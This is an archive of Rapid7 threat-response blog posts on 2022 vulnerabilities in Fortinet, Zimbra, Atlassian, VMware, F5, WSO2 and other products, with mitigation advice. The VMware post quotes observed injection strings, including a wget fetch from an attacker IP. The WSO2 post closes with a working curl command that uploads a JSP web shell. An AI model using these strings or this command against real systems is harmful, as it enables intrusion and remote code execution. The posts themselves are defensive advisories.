Tag Archives: Emergent Threat Response

CVE-2022-40684: Remote Authentication Bypass Vulnerability in Fortinet Firewalls, Web Proxies

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/10/07/cve-2022-40684-remote-authentication-bypass-vulnerability-in-fortinet-firewalls-web-proxies/

CVE-2022-40684: Remote Authentication Bypass Vulnerability in Fortinet Firewalls, Web Proxies

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

On October 3, 2022, Fortinet released a software update that indicates then-current versions of their FortiOS (firewall) and FortiProxy (web proxy) software are vulnerable to CVE-2022-40684, a critical vulnerability that allows remote, unauthenticated attackers to bypass authentication and gain access to the administrative interface of these products with only a specially crafted http/s request.

According to communications from Fortinet that were shared on social media, Fortinet “is strongly recommending all customers with vulnerable versions to perform an immediate upgrade.”

Affected products

  • FortiOS 7.0.0 to 7.0.6
  • FortiOS 7.2.0 to 7.2.1
  • FortiProxy 7.0.0 to 7.0.6 and 7.2.0

Remediation

On Thursday, October 6, 2022, Fortinet released version 7.0.7 and version 7.2.2, which resolve the vulnerability.

Along with Fortinet, Rapid7 strongly recommends that organizations who are running an affected version of the software upgrade to 7.07 or 7.2.2 immediately, on an emergency basis. These products are edge devices, which are high-value and high-focus targets for attackers looking to gain internal network access. While Rapid7 is not currently aware of exploitation in the wild for this vulnerability, using prior FortiOS vulnerabilities as in indicator (such as CVE-2018-13379) we expect attackers to focus on CVE-2022-40684 quickly and for quite some time.

Furthermore, Rapid7 recommends that all high-value edge devices limit public access to any administrative interface.

Rapid7 customers

InsightVM/Nexpose customers: Our researchers are currently working on adding vulnerability check(s).

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Exploitation of Unpatched Zero-Day Remote Code Execution Vulnerability in Zimbra Collaboration Suite (CVE-2022-41352)

Post Syndicated from Ron Bowes original https://blog.rapid7.com/2022/10/06/exploitation-of-unpatched-zero-day-remote-code-execution-vulnerability-in-zimbra-collaboration-suite-cve-2022-41352/

Exploitation of Unpatched Zero-Day Remote Code Execution Vulnerability in Zimbra Collaboration Suite (CVE-2022-41352)

CVE-2022-41352 is an unpatched remote code execution vulnerability in Zimbra Collaboration Suite discovered in the wild due to active exploitation. The vulnerability is due to the method (cpio) in which Zimbra’s antivirus engine (Amavis) scans inbound emails. Zimbra has provided a workaround, which is to install the pax utility and restart the Zimbra services. Note that pax is installed by default on Ubuntu, so Ubuntu-based Zimbra installations are not vulnerable by default.

Note: This vulnerability, CVE-2022-41352 is effectively identical to CVE-2022-30333 but leverages a different file format (.cpio and .tar as opposed to .rar). It is also a byproduct of a much older (unfixed) vulnerability, CVE-2015-1197. While the original CVE-2015-1197 affects most major Linux distros, our research team found that it is not exploitable unless a secondary application – such as Zimbra, in this case – uses cpio to extract untrusted archives; therefore, this blog is only focusing on Zimbra CVE-2022-41352.

Rapid7 has published technical documentation, including proof-of-concept (PoC) and indicator-of-compromise (IoC) information, regarding CVE-2022-41352 on AttackerKB.

Background

To exploit this vulnerability, an attacker would email a .cpio, .tar, or .rpm to an affected server. When Amavis inspects it for malware, it uses cpio to extract the file. Since cpio has no mode where it can be securely used on untrusted files, the attacker can write to any path on the filesystem that the Zimbra user can access. The most likely outcome is for the attacker to plant a shell in the web root to gain remote code execution, although other avenues likely exist.

As of October 6, 2022, CVE-2022-41352 is not patched, but Zimbra has acknowledged the risk of relying on cpio in a blog post where they recommend mitigations. CVE-2022-41352 was discovered in the wild due to active exploitation. Recently, CISA and others have warned of multiple threat actors leveraging other vulnerabilities in Zimbra, which makes it likely that threat actors would logically move to exploit this latest unpatched vulnerability, too. In August, Rapid7 reported on the active exploitation of multiple vulnerabilities in Zimbra Collaboration Suite.

Affected products

Please note that information on affected versions or requirements for exploitability may change as we learn more about the threat.

To be exploitable, two conditions must exist:

  1. A vulnerable version of cpio must be installed, which is the case on basically every system (see CVE-2015-1197)
  2. The pax utility must not be installed, as Amavis prefers pax and pax is not vulnerable

Unfortunately, pax is not installed by default on Red Hat-based distros, and therefore they are vulnerable by default. We tested all (current) Linux distros that Zimbra officially supports in their default configurations and determined the following:

Linux Distro Vulnerable?
Oracle Linux 8 Vulnerable
Red Hat Enterprise Linux 8 Vulnerable
Rocky Linux 8 Vulnerable
CentOS 8 Vulnerable
Ubuntu 20.04 Not vulnerable (pax is installed by default)
Ubuntu 18.04 Not vulnerable (pax is installed, cpio has Ubuntu’s custom patch)

Zimbra says that their plan is to remove the dependency on cpio entirely by making pax a prerequisite for Zimbra Collaboration Suite. Moving to pax is the best option since cpio cannot be used securely (because most major operating systems removed a security patch).

Mitigation

Organizations that use an impacted version of Zimbra Collaboration Suite should apply their recommended workaround, which is to install the pax archive utility, then restart Zimbra or reboot while monitoring for further software updates from Zimbra.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2022-41352 via an authenticated vulnerability check (supported by Agent- and Scanner-based assessments) expected to be available in the October 6 content release. This check will identify systems with an affected version of Zimbra Collaboration Suite installed where the pax package is not available.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Suspected Post-Authentication Zero-Day Vulnerabilities in Microsoft Exchange Server

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2022/09/29/suspected-post-authentication-zero-day-vulnerabilities-in-microsoft-exchange-server/

Suspected Post-Authentication Zero-Day Vulnerabilities in Microsoft Exchange Server

On Thursday, September 29, a Vietnamese security firm called GTSC published information and IOCs on what they claim is a pair of unpatched Microsoft Exchange Server vulnerabilities being used in attacks on their customers’ environments dating back to early August 2022. The impact of exploitation is said to be remote code execution. From the information released, both vulnerabilities appear to be post-authentication flaws. According to GTSC, the vulnerabilities are being exploited to drop webshells on victim systems and establish footholds for post-exploitation behavior.

There has been no formal communication from Microsoft confirming or denying the existence of the flaws as of 4:30 PM EDT on Thursday, September 29. Our own teams have not validated the vulnerabilities directly.

Notably, it appears that both vulnerabilities have been reported to (and accepted by) Trend Micro’s Zero Day Initiative (ZDI) for disclosure coordination and are listed on ZDI’s site as “Upcoming Advisories.” This lends credibility to the claim, as does the specificity of the indicators shared in the firm’s blog. You can view the two reported vulnerabilities on this page by searching ZDI’s advisories for ZDI-CAN-18802 and ZDI-CAN-18333.

We are monitoring for additional detail and official communications and will update this blog with further information as it becomes available.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

CVE-2022-36804: Easily Exploitable Vulnerability in Atlassian Bitbucket Server and Data Center

Post Syndicated from Ron Bowes original https://blog.rapid7.com/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/

CVE-2022-36804: Easily Exploitable Vulnerability in Atlassian Bitbucket Server and Data Center

On August 24, 2022, Atlassian published an advisory for Bitbucket Server and Data Center alerting users to CVE-2022-36804. The advisory reveals a command injection vulnerability in multiple API endpoints, which allows an attacker with access to a public repository or with read permissions to a private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. CVE-2022-36804 carries a CVSSv3 score of 9.8 and is easily exploitable. Rapid7’s vulnerability research team has a full technical analysis in AttackerKB, including how to use CVE-2022-36804 to create a simple reverse shell.

According to Shodan, there are about 1,400 internet-facing servers, but it’s not immediately obvious how many have a public repository. There are no public reports of exploitation in the wild as of September 20, 2022, but there has been strong interest in the vulnerability from researchers and exploit brokers, and there are now multiple public exploits available. Because the vulnerability is trivially exploitable and the patch is relatively simple to reverse- engineer, it’s likely that targeted exploitation has already occurred in the wild. We expect to see larger-scale exploitation of CVE-2022-36804 soon.

Affected products:
Bitbucket Server and Data Center 7.6 prior to 7.6.17
Bitbucket Server and Data Center 7.17 prior to 7.17.10
Bitbucket Server and Data Center 7.21 prior to 7.21.4
Bitbucket Server and Data Center 8.0 prior to 8.0.3
Bitbucket Server and Data Center 8.1 prior to 8.1.3
Bitbucket Server and Data Center 8.2 prior to 8.2.2
Bitbucket Server and Data Center 8.3 prior to 8.3.1

Mitigation guidance

Organizations that use Bitbucket Server and Data Center in their environments should patch as quickly as possible using Atlassian’s guide, without waiting for a regular patch cycle to occur. Blocking network access to Bitbucket may also function as a temporary stop-gap solution, but this should not be a substitute for patching.

Rapid7 customers

Our engineering team is in the process of developing a vulnerability check for CVE-2022-36804. We will update this blog with further information as it becomes available.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2022/08/17/active-exploitation-of-multiple-vulnerabilities-in-zimbra-collaboration-suite/

Active Exploitation of Multiple Vulnerabilities in Zimbra Collaboration Suite

Over the past few weeks, five different vulnerabilities affecting Zimbra Collaboration Suite have come to our attention, one of which is unpatched, and four of which are being actively and widely exploited in the wild by well-organized threat actors. We urge organizations who use Zimbra to patch to the latest version on an urgent basis, and to upgrade future versions as quickly as possible once they are released.

Exploited RCE vulnerabilities

The following vulnerabilities can be used for remote code execution and are being exploited in the wild.

CVE-2022-30333

CVE-2022-30333 is a path traversal vulnerability in unRAR, Rarlab’s command line utility for extracting RAR file archives. CVE-2022-30333 allows an attacker to write a file anywhere on the target file system as the user that executes unrar. Zimbra Collaboration Suite uses a vulnerable implementation of unrar (specifically, the amavisd component, which is used to inspect incoming emails for spam and malware). Zimbra addressed this issue in 9.0.0 patch 25 and 8.5.15 patch 32 by replacing unrar with 7z.

Our research team has a full analysis of CVE-2022-30333 in AttackerKB. A Metasploit module is also available. Note that the server does not necessarily need to be internet-facing to be exploited — it simply needs to receive a malicious email.

CVE-2022-27924

CVE-2022-27924 is a blind Memcached injection vulnerability first analyzed publicly in June 2022. Successful exploitation allows an attacker to change arbitrary keys in the Memcached cache to arbitrary values. In the worst-case scenario, an attacker can steal a user’s credentials when a user attempts to authenticate. Combined with CVE-2022-27925, an authenticated remote code execution vulnerability, and CVE-2022-37393, a currently unpatched privilege escalation issue that was publicly disclosed in October 2021, capturing a user’s password can lead to remote code execution as the root user on an organization’s email server, which frequently contains sensitive data.

Our research team has a full analysis of CVE-2022-27924 in AttackerKB. Note that an attacker does need to know a username on the server in order to exploit CVE-2022-27924. According to Sonar, it is also possible to poison the cache for any user by stacking multiple requests.

CVE-2022-27925

CVE-2022-27925 is a directory traversal vulnerability in Zimbra Collaboration Suite versions 8.8.15 and 9.0 that allows an authenticated user with administrator rights to upload arbitrary files to the system. On August 10, 2022, security firm Volexity published findings from multiple customer compromise investigations that indicated CVE-2022-27925 was being exploited in combination with a zero-day authentication bypass, now assigned CVE-2022-37042, that allowed attackers to leverage CVE-2022-27925 without authentication.

CVE-2022-37042

As noted above, CVE-2022-37042 is a critical authentication bypass that arises from an incomplete fix for CVE-2022-27925. Zimbra patched CVE-2022-37042 in 9.0.0P26 and 8.8.15P33.

Unpatched privilege escalation CVE-2022-37393

In October of 2021, researcher Darren Martyn published an exploit for a zero-day root privilege escalation vulnerability in Zimbra Collaboration Suite. When successfully exploited, the vulnerability allows a user with a shell account as the zimbra user to escalate to root privileges. While this issue requires a local account on the Zimbra host, the previously mentioned vulnerabilities in this blog post offer plenty of opportunity to obtain it.

Our research team tested the privilege escalation in combination with CVE-2022-30333 and CVE-2022-27924 at the end of July 2022 and found that at the time, all versions of Zimbra were affected through at least 9.0.0 P25 and 8.8.15 P32. Rapid7 disclosed the vulnerability to Zimbra on July 21, 2022 and later assigned CVE-2022-37393 (still awaiting NVD analysis) to track it. A full analysis of CVE-2022-37393 is available in AttackerKB. A Metasploit module is also available.

Mitigation guidance

We strongly advise that all organizations who use Zimbra in their environments update to the latest available version (at time of writing, the latest versions available are 9.0.0 P26 and 8.8.15 P33) to remediate known remote code execution vectors. We also advise monitoring Zimbra’s release communications for future security updates, and patching on an urgent basis when new versions become available.

The AttackerKB analyses for CVE-2022-30333, CVE-2022-27924, and CVE-2022-37393 all include vulnerability details (including proofs of concept) and sample IOCs. Volexity’s blog also has information on how to look for webshells dropped on Zimbra instances, such as comparing the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. They have published lists of valid JSP files included in Zimbra installations for the latest version of 8.8.15 and of 9.0.0 (at time of writing).

Finally, we recommend blocking internet traffic to Zimbra servers wherever possible and configuring Zimbra to block external Memcached, even on patched versions of Zimbra.

Rapid7 customers

Our engineering team is in the investigation phase of vulnerability check development and will assess the risk and customer needs for each vulnerability separately. We will update this blog with more information as it becomes available.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26138

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/

Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26138

Exploitation is underway for one of the trio of critical Atlassian vulnerabilities that were published last week affecting several the company’s on-premises products. Atlassian has been a focus for attackers, as it was less than two months ago that we observed exploitation of CVE-2022-26134 in Confluence Server and Confluence Data Center.

CVE-2022-26138: Hardcoded password in Questions for Confluence app impacting:

  • Confluence Server
  • Confluence Data Center

CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities impacting:

  • Bamboo Server and Data Center
  • Bitbucket Server and Data Center
  • Confluence Server and Data Center
  • Crowd Server and Data Center
  • Crucible
  • Fisheye
  • Jira Server and Data Center
  • Jira Service Management Server and Data Center

CVE-2022-26138: Hardcoded password in Questions for Confluence app

The most critical of these three is CVE-2022-26138, as it was quickly exploited in the wild once the hardcoded password was released on social media. There is a limiting function here, however, as this vulnerability only exists when the Questions for Confluence app is enabled (and does not impact the Confluence Cloud instance). Once the app is enabled on affected versions, it will create a user account with a hardcoded password and add the account to a user group, which allows access to all non-restricted pages in Confluence. This easily allows a remote, unauthenticated attacker to browse an organization’s Confluence instance. Unsurprisingly, it didn’t take long for Rapid7 to observe exploitation once the hardcoded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks.

Affected versions

  • Questions for Confluence 2.7.x

    • 2.7.34
    • 2.7.35

  • Questions for Confluence

    • 3.0.x
    • 3.0.2

Mitigation guidance

Organizations using on-prem Confluence should follow Atlassian’s guidance on updating their instance or disabling/deleting the account. Rapid7 recommends organizations impacted by this take steps immediately to mitigate the vulnerability. Atlassian’s advisory also includes information on how to look for evidence of exploitation. An FAQ has also been provided.

Please note: Atlassian’s Questions For Confluence Security Advisory 2022-07-20 has a very important call-out that “uninstalling the Questions for Confluence app does not remediate this vulnerability.”

CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities

Two other vulnerabilities were announced at the same time, CVE-2022-26136 and CVE-2022-26137, which are also rated critical by Atlassian. They both are issues with Servlet Filters in Java and can be exploited by remote, unauthenticated attackers. Cloud versions of Atlassian have already been fixed by the company.

The list of affected versions is long and can be found on Atlassian’s Security Advisory.

While the impact of these vulnerabilities will vary by organization, as mentioned above, attackers place a high value on many Atlassian products. Therefore, Rapid7 recommends that organizations update impacted product versions as there is no mitigation workaround available.

Rapid7 customers

InsightVM and Nexpose: Our engineering team is investigating the feasibility of a vulnerability check to help InsightVM and Nexpose customers assess exposure to CVE-2022-26138.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Exploitation of Mitel MiVoice Connect SA CVE-2022-29499

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/

Exploitation of Mitel MiVoice Connect SA CVE-2022-29499

In April 2022, telecommunications company Mitel published a security advisory on CVE-2022-29499, a data validation vulnerability in the Service Appliance component of MiVoice Connect, a business communications product. The vulnerability, which was unpatched at time of publication, arose from insufficient data validation for a diagnostic script and potentially allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution. CVE-2022-29499 has a CVSSv3 score of 9.8.

On June 23, 2022, security firm Crowdstrike published an analysis on a ransomware intrusion attempt that had targeted CVE-2022-29499 — which at the time of detection was an undisclosed zero-day vulnerability — as an initial access vector. Over the past two weeks, Rapid7 Managed Detection and Response (MDR) has also observed a small number of intrusions that have leveraged CVE-2022-29499 as an initial access vector.

There is currently no indication that a large number of these appliances are exposed to the public internet, and we have no evidence that this vulnerability is being targeted in wider-scale ransomware campaigns. We are conscious of the fact, however, that the proliferation of ransomware in general has continued to shape risk models for many organizations, and that network perimeter devices are tempting targets for a variety of attackers.

Affected products

CVE-2022-29499 affects MiVoice Connect deployments (including earlier versions 14.2) that include the MiVoice Connect Service Appliances, SA 100, SA 400 and/or Virtual SA. Vulnerable firmware versions include R19.2 SP3 (22.20.2300.0) and earlier, and R14.x and earlier. See Mitel product security advisory 22-0002 and their security bulletin for additional information.

Mitigation guidance

Mitel MiVoice Connect customers who use vulnerable versions of the Service Appliance in their deployments should update to a fixed version of the appliance immediately. Mitel released patches for CVE-2022-29499 in early June 2022; organizations that have not updated the firmware on their appliances since before that timeframe should apply fixes as soon as possible.

Rapid7 customers

We have not been able to determine whether a vulnerability check is feasible at this time. We are investigating alternative options to help InsightVM and Nexpose customers assess exposure, including the potential to generically fingerprint MiVoice Connect in customer environments.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

CVE-2022-27511: Citrix ADM Remote Device Takeover

Post Syndicated from Erick Galinkin original https://blog.rapid7.com/2022/06/16/cve-2022-27511-citrix-adm-remote-device-takeover/

CVE-2022-27511: Citrix ADM Remote Device Takeover

On Monday, June 14, 2022, Citrix published an advisory on CVE-2022-27511, a critical improper access control vulnerability affecting their Application Delivery Management (ADM) product.

A remote, unauthenticated attacker can leverage CVE-2022-27511 to reset administrator credentials to the default value at the next reboot. This allows the attacker to use SSH and the default administrator credentials to access the affected management console. The vulnerability has been patched in Citrix ADM 13.1-21.53 and ADM 13.0-85.19 and should be applied as soon as possible. Versions of Citrix ADM before 13.0 and 13.1 are end of life, so Citrix will not make patches available for these versions. Users still on version 12.x are encouraged to upgrade to a supported version.

At the time of this writing, no exploitation has been observed, and no exploits have been made publicly available. However, given the nature of the vulnerability and the footprint of Citrix ADM, we anticipate that exploitation will happen as soon as an exploit is made available.

Mitigation guidance

Citrix ADM customers should upgrade their versions of both ADM server and agents as soon as possible. Citrix notes in their advisory that they strongly recommend that network traffic to the Citrix ADM’s IP address be segmented, either physically or logically, from standard network traffic.

Rapid7 customers

We are investigating the feasibility of a vulnerability check for InsightVM and Nexpose customers.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Active Exploitation of Confluence CVE-2022-26134

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/

Active Exploitation of Confluence CVE-2022-26134

On June 2, 2022, Atlassian published a security advisory for CVE-2022-26134, a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability is unpatched as of June 2 and is being exploited in the wild.

Affected versions include Confluence Server version 7.18.0. According to Atlassian’s advisory, subsequent testing indicates that versions of Confluence Server and Data Center >= 7.4.0 are potentially vulnerable. There may also be other vulnerable versions not yet tested.

Security firm Volexity has in-depth analysis of attacks they have observed targeting CVE-2022-26134, including indicators of compromise and hunting rules.

Mitigation guidance

In the absence of a patch, organizations should restrict or disable Confluence Server and Confluence Data Center instances on an emergency basis. They should also consider implementing IP address safelisting rules to restrict access to Confluence.

For those unable to apply safelist IP rules to their Confluence server installations, consider adding WAF protection. Based on the details published so far, which admittedly are sparse, we recommend adding Java Deserialization rules that defend against RCE injection vulnerabilities, such as CVE-2021-26084. You can find an example here.

Rapid7 customers

We are investigating options for a vulnerability check to allow InsightVM and Nexpose customers to assess their exposure to CVE-2022-26134. We will update this blog as new information becomes available.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

CVE-2022-30190: “Follina” Microsoft Support Diagnostic Tool Vulnerability

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/

CVE-2022-30190:

On May 30, 2022, Microsoft Security Response Center (MSRC) published a blog on CVE-2022-30190, an unpatched vulnerability in the Microsoft Support Diagnostic Tool (msdt) in Windows. Microsoft’s advisory on CVE-2022-30190 indicates that exploitation has been detected in the wild.

According to Microsoft, CVE-2022-30190 is a remote code execution vulnerability that exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights. Workarounds are available in Microsoft’s blog.

Rapid7 research teams are investigating this vulnerability and will post updates to this blog as they are available. Notably, the flaw requires user interaction to exploit, looks similar to many other vulnerabilities that necessitate a user opening an attachment, and appears to leverage a vector described in 2020. Despite the description, it is not a typical remote code execution vulnerability.

Rapid7 customers

Our teams have begun working on a vulnerability check for InsightVM and Nexpose customers.

InsightIDR customers have a new detection rule added to their library to identify attacks related to this vulnerability:

  • Suspicious Process – Microsoft Office App Spawns MSDT.exe

We recommend that you review your settings for this detection rule and confirm it is turned on and set to an appropriate rule action and priority for your organization.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

CVE-2022-22972: Critical Authentication Bypass in VMware Workspace ONE Access, Identity Manager, and vRealize Automation

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/05/19/cve-2022-22972-critical-authentication-bypass-in-vmware-workspace-one-access-identity-manager-and-vrealize-automation/

CVE-2022-22972: Critical Authentication Bypass in VMware Workspace ONE Access, Identity Manager, and vRealize Automation

On May 18, 2022, VMware published VMSA-2022-0014 on CVE-2022-22972 and CVE-2022-22973. The more severe of the two vulnerabilities is CVE-2022-22972, a critical authentication bypass affecting VMware’s Workspace ONE Access, Identity Manager, and vRealize Automation solutions. The vulnerability allows attackers with network access to the UI to obtain administrative access without the need to authenticate. CVE-2022-22972 may be chained with CVE-2022-22973 to bypass authentication and obtain root access. A full list of affected products is available in VMware’s advisory.

At time of writing, there is no public proof of concept for CVE-2022-22972, and there have been no reports of exploitation in the wild. We expect this to change quickly, however, since Rapid7 researchers have seen similar VMware vulnerabilities come under attack quickly in recent weeks. In April 2022, we published details on CVE-2022-22954, a server-side template injection flaw that was widely exploited by threat actors targeting internet-facing VMware Workspace ONE and Identity Manager applications.

In conjunction with VMware’s advisory on May 18, the US Cybersecurity and Infrastructure Agency (CISA) published Emergency Directive 22-03 in response to VMSA-2022-0014. The directive requires all “Federal Civilian Executive Branch” agencies to either apply the patch or remove affected VMware installations from agency networks by May 24, 2022. CISA also released an additional alert emphasizing that threat actors are known to be chaining recent VMware vulnerabilities — CVE-2022-22954 and CVE-2022-22960 — to gain full control of vulnerable systems. CISA’s alert notes that the new vulnerabilities in VMSA-2022-0014 are likely to be exploited in the wild quickly:

Due to the [likely] rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with affected VMware products that are accessible from the internet — that did not immediately apply updates — to assume compromise.

Mitigation guidance

VMware customers should patch their Workspace ONE Access, Identity Manager, and vRealize Automation installations immediately, without waiting for a regular patch cycle to occur. VMware has instructions here on patching and applying workarounds.

Additionally, if your installation is internet-facing, consider taking steps to remove direct access from the internet. It may also be prudent to follow CISA’s guidance on post-exploitation detection methods found in Alert (AA22-138B).

Rapid7 customers

InsightVM and Nexpose customers can assess their VMware Workspace ONE Access and Identity Manager systems’ exposure to CVE-2022-22972 and CVE-2022-22973 with authenticated vulnerability checks for Unix-like systems available in the May 19, 2022 content release. (Note that VMware Workspace ONE Access is only able to be deployed on Linux from 20.x onward.) Additional vulnerability coverage will be evaluated as the need arises.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388

Post Syndicated from Ron Bowes original https://blog.rapid7.com/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/

Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388

On May 4, 2022, F5 released an advisory listing several vulnerabilities, including CVE-2022-1388, a critical authentication bypass that leads to remote code execution in iControl REST with a CVSSv3 base score of 9.8.

The vulnerability affects several different versions of BIG-IP prior to 17.0.0, including:

  • F5 BIG-IP 16.1.0 – 16.1.2 (patched in 16.1.2.2)
  • F5 BIG-IP 15.1.0 – 15.1.5 (patched in 15.1.5.1)
  • F5 BIG-IP 14.1.0 – 14.1.4 (patched in 14.1.4.6)
  • F5 BIG-IP 13.1.0 – 13.1.4 (patched in 13.1.5)
  • F5 BIG-IP 12.1.0 – 12.1.6 (no patch available, will not fix)
  • F5 BIG-IP 11.6.1 – 11.6.5 (no patch available, will not fix)

On Monday, May 9, 2022, Horizon3 released a full proof of concept, which we successfully executed to get a root shell. Other groups have developed exploits as well.

Over the past few days, BinaryEdge has detected an increase in scanning and exploitation for F5 BIG-IP. Others on Twitter have also observed exploitation attempts. Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase.

Widespread exploitation is somewhat mitigated by the small number of internet-facing F5 BIG-IP devices, however; our best guess is that there are only about 2,500 targets on the internet.

Mitigation guidance

F5 customers should patch their BIG-IP devices as quickly as possible using F5’s upgrade instructions. Additionally, the management port for F5 BIG-IP devices (and any similar appliance) should be tightly controlled at the network level — only authorized users should be able to reach the management interface at all.

F5 also provides a workaround as part of their advisory. If patching and network segmentation are not possible, the workaround should prevent exploitation. We always advise patching rather than relying solely on workarounds.

Exploit attempts appear in at least two different log files:

  • /var/log/audit
  • /var/log/restjavad-audit.0.log

Because this vulnerability is a root compromise, successful exploitation may be very difficult to recover from. At a minimum, affected BIG-IP devices should be rebuilt from scratch, and certificates and passwords should be rotated.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2022-1388 with an authenticated vulnerability check in the May 5, 2022 content release. This release also includes authenticated vulnerability checks for additional CVEs in F5’s May 2022 security advisory.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/

Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954

On April 6, 2022, VMware published VMSA-2022-0011, which detailed multiple security vulnerabilities. The most severe of these is CVE-2022-22954, a critical remote code execution vulnerability affecting VMware’s Workspace ONE Access and Identity Manager solutions. The vulnerability arises from a server-side template injection flaw and has a CVSSv3 base score of 9.8. Successful exploitation allows an unauthenticated attacker with network access to the web interface to execute an arbitrary shell command as the VMware user.

Affected products:

  • VMware Workspace ONE Access (Access) 20.10.0.0 – 20.10.0.1, 21.08.0.0 – 21.08.0.1
  • VMware Identity Manager (vIDM) 3.3.3 – 3.3.6

VMware updated their advisory to note active exploitation in the wild on April 12, 2022; a day later, security news outlet Bleeping Computer indicated that several public proof-of-concept exploits were being used in the wild to drop coin miners on vulnerable systems. More recently, security firm Morphisec published analysis of attacks that exploited CVE-2022-22954 to deploy reverse HTTPS backdoors. Public proof-of-concept exploit code is available and fits in a tweet (credit to researchers wvu and Udhaya Prakash).

Rapid7’s Project Heisenberg detected scanning/exploitation activity on 2022-04-13 and again on 2022-04-22. A total of 14 requests were observed across ports 80, 98, 443, 4443.

Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954

Scanning/exploitation strings observed:

  • /catalog-portal/ui/oauth/verify
  • /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")}
  • /catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("wget -U "Hello 1.0" -qO - http://106[.]246[.]224[.]219/one")}

Attacker IP addresses:
103[.]42[.]196[.]67
5[.]157[.]38[.]50
54[.]38[.]103[.]1 (NOTE: according to this French government website, this IP address is benign)
94[.]74[.]123[.]228
96[.]243[.]27[.]61
107[.]174[.]218[.]172
170[.]210[.]45[.]163
173[.]212[.]229[.]216

These nodes appear to be members of generic botnets. Rapid7’s Heisenberg network has observed many of them involved in the same campaigns as noted in the above graphic, as well as Log4Shell exploitation attempts.

Mitigation guidance

VMware customers should patch their Workspace ONE Access and Identity Manager installations immediately, without waiting for a regular patch cycle to occur. VMware has instructions here on patching and applying workarounds. VMware has an FAQ available on this advisory here.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2022-22954 with an authenticated vulnerability check for Unix-like systems. (Note that VMware Workspace ONE Access is only able to be deployed on Linux from 20.x onward.)

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Opportunistic Exploitation of WSO2 CVE-2022-29464

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/

Opportunistic Exploitation of WSO2 CVE-2022-29464

On April 18, 2022, MITRE published CVE-2022-29464 , an unrestricted file upload vulnerability affecting various WSO2 products. WSO2 followed with a security advisory explaining the vulnerability allowed unauthenticated and remote attackers to execute arbitrary code in the following products:

  • API Manager
  • Identity Server
  • Identity Server Analytics
  • Identity Server as Key Manager
  • Enterprise Integrator

A technical writeup and proof-of-concept exploit by @hakivvi quickly followed on April 20. The proof of concept uploads a malicious .jsp to /fileupload/toolsAny on the WSO2 product’s webserver. The .jsp is a web shell, and due to a directory traversal issue affecting the upload files name, the attacker can write it to a location where they can then send it commands. The attack is not restricted to .jsp files — other researchers, such as our old friend William Vu, have demonstrated exploitation with a war file.

Exploitation is quite easy. The following, modeled after both the original PoC and Vu’s, uploads a simple jsp web shell that the attacker will be able to use by visiting https://target:9443/authenticationendpoint/r7.jsp:

echo '<%@ page import="java.io.*" %><% Process p = Runtime.getRuntime().
exec(request.getParameter("cmd"),null,null); %>' | curl -kv -F ../../
../../repository/deployment/server/webapps/authenticationendpoint/r7.
jsp=@- https://10.0.0.20:9443/fileupload/toolsAny

